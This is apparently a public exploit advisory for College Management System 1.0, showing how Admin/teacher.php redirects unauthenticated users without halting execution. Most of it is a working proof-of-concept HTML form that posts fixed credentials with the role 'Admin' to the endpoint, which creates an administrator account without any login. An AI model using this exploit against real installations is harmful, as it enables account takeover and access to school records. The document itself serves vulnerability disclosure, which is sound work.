College Management System 1.0 Insecure Direct Object Reference

`# Exploit Title: college management system - Add admin (Unauthenticated)  
# Date: 01/10/2021  
# Exploit Author: Abdulrahman https://twitter.com/infosec_90  
# Vendor Homepage: https://www.eedunext.com/  
# Software Link: https://code-projects.org/college-management-system-in-php-with-source-code/  
# Version: 1.0  
# Tested on: Kali Linux  
  
  
in Admin/teacher.php in line 1  
  
  
<?php  
session_start();  
if (!$_SESSION["LoginAdmin"])  
{  
header('location:../login/login.php');  
}  
require_once "../connection/connection.php";  
$_SESSION['LoginTeacher']="";  
?>  
  
in Admin/teacher.php  
  
line 23 :$email=$_POST["email"];  
line 63 :$password=$_POST['password'];  
line 65 :$role=$_POST['role'];  
  
  
  
role Admin,Teacher,Student  
  
  
POC :  
  
  
<html lang="en">  
<head>  
<title>ADD Amin</title>  
</head>  
<body class="login-background">  
<!doctype html>  
<html lang="en">  
<head>  
<meta charset="utf-8">  
  
<!-- css style goes here -->  
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">  
  
  
<!-- css style go to end here -->  
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">  
</head>  
<body>  
  
  
  
<div class="row m-3">  
<div class="col-md-12">  
<form action="http://127.0.0.1/2/College-Management-System/admin/Teacher.php" method="POST" enctype="multipart/form-data">  
<div class="row mt-3">  
  
<div>  
<input type="text" name="email" value="[email protected]">  
<input type="text" name="password" value="123456">  
<input type="text" name="role" value="Admin">  
<input type="text" name="account" value="Activate">  
</div>  
<div class="modal-footer">  
<input type="submit" class="btn btn-primary px-5" name="btn_save">  
</div>  
</form>  
</div>  
</div>  
`